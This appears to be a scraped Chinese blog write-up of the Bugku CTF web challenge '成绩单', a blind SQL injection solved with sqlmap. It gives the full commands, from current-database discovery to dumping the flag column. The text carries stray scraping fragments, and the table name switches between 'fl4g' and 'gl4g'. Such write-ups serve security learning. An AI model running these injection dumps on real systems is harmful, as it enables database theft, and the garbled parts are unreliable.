【Writeup】Bugku-Web-成绩单
打开来是成绩查询的界面sql
随便输入一下1获得:数据库
基本已经能肯定是sql注入的题了,但这道题没有回显,手动测试很麻烦(我也不太会),因此用sqlmappost
burp抓包,发现是一个post请求,将请求内容复制下来在kali中保存为一个txt(这样要比直接测试url快)测试
(此处插播一个小点——刚配置好的kali是不能直接获取物理机上剪贴板的内容的,须要执行如下操做:url
接下来经过sqlmap找当前数据库的名字:spa
1 sqlmap -r chengji.txt -p id --current-db
继续查找其中的tables:3d
1 sqlmap -r chengji.txt -p id -D skctf_flag --tables
flag应该在fl4g这个表中,继续查找字段:code
1 sqlmap -r chengji.txt -p id -D skctf_flag -T gl4g --columns
只有一个字段就是咱们须要的flag,查看一下它的内容:blog
1 sqlmap -r chengji.txt -p id -D skctf_flag -T gl4g -C skctf_flag --dump
获得flagio
我本次使用sqlmap的时候不知道为何特别慢,老是出现下面这句话,不知道怎么能解决一下
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')?
相关文章
- 1. bugku成绩单(sql注入)writeup
- 2. bugku成绩单
- 3. Vue成绩单
- 4. BugkuCTF 成绩单
- 5. Bugku:web 成绩单
- 6. 成绩单
- 7. BugkuCTF-Web-成绩单
- 8. 成绩单 (bugku--web)
- 9. BugKu之成绩单
- 10. [LOJ2292] [THUSC2016] 成绩单
- 更多相关文章...
- • Eclipse 生成jar包 - Eclipse 教程
- • jQuery Mobile 表单 - jQuery Mobile 教程
- • TiDB 在摩拜单车在线数据业务的应用和实践
- • 三篇文章了解 TiDB 技术内幕——说存储
相关标签/搜索
每日一句
-
每一个你不满意的现在,都有一个你没有努力的曾经。
欢迎关注本站公众号,获取更多信息
相关文章
- 1. bugku成绩单(sql注入)writeup
- 2. bugku成绩单
- 3. Vue成绩单
- 4. BugkuCTF 成绩单
- 5. Bugku:web 成绩单
- 6. 成绩单
- 7. BugkuCTF-Web-成绩单
- 8. 成绩单 (bugku--web)
- 9. BugKu之成绩单
- 10. [LOJ2292] [THUSC2016] 成绩单